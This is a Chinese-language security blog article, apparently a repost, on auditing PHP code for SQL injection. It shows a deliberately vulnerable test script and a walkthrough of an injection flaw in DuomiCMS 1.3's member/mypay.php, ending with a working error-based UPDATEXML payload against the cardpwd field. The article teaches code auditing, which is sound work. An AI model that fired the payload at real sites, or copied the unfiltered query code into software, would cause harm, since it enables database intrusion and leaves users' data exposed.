PHP代码审计SQL注入篇

admin 2021年9月8日19:47:03评论109 views字数 2127阅读7分5秒阅读模式

什么是SQL注入

SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。

而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码。

SQL注入实例

很多Web开发者没有意识到SQL查询是可以被篡改的,从而把SQL查询当作可信任的命令。殊不知,SQL查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过SQL查询去运行主机系统级的命令。

下面将通过一些真实的例子来详细讲解SQL注入的方式。

 PHP代码审计SQL注入篇

 

测试代码如下:

  1. <?php

  2. $uid=$_GET['id'];

  3. $sql="SELECT * FROM userinfo where id=$uid";

  4. $conn=mysql_connect ('localhost','root','root');

  5. mysql_select_db("sql",$conn);

  6. $result=mysql_query($sql,$conn);

  7. print_r('当前SQL语句: '.$sql.'
    结果: '
    );

  8. print_r(mysql_fetch_row($result));

  9. ?>

PHP代码审计SQL注入篇

 

首先我们看一下代码:

  1. $uid=$_GET['id']; //获取GET值

  1. $sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句

  1. $conn=mysql_connect ('localhost','root','root');

  2. mysql_select_db("sql",$conn); //数据库配配置

  1. $result=mysql_query($sql,$conn); //进行查询SQL语句

  1. print_r('当前SQL语句: '.$sql.'
    结果: '
    );

  2. print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。

PHP代码审计SQL注入篇

 

从截图可以看出原本的SQL语句已被注入更改,使用了UNION查询到当前用户。

另外一个多米CMS最新版1.3版本注入实例。

漏洞文件member/mypay.php(14-40行)

  1. if(empty($_SESSION['duomi_user_id'])){

  2.    showMsg("请先登录","login.php");

  3.    exit();

  4. }

  5. elseif($dm=='mypay'){

  6.    $key=$_POST['cardkey'];

  7.    if($key==""){showMsg("请输入充值卡号","-1");exit;}

  8.    $pwd=$_POST['cardpwd'];

  9.    if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}

  10.    $sqlt="SELECT * FROM duomi_card where ckey='$key'";

  11.    $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";

  12.       $row1 = $dsql->GetOne($sqlt);

  13.    if(!is_array($row1) OR $row1['status']<>0){

  14.        showMsg("充值卡信息有误","-1");exit;

  15.    }else{

  16.        $uname=$_SESSION['duomi_user_name'];

  17.        $points=$row1['climit'];

  18.        $dsql->executeNoneQuery("UPDATE duomi_card SET    usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");

  19.        $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");

  20.        $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");

  21.        showMsg("恭喜!充值成功!","mypay.php");exit;

  22.    }

  23. }

  24. else

  25. {


此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行):

  1. http://localhost/member/mypay.php?dm=mypay

  2. POSTcardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1


PHP代码审计SQL注入篇

 


本文始发于微信公众号(飓风网络安全):PHP代码审计SQL注入篇

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日19:47:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP代码审计SQL注入篇http://cn-sec.com/archives/359599.html

发表评论

匿名网友 填写信息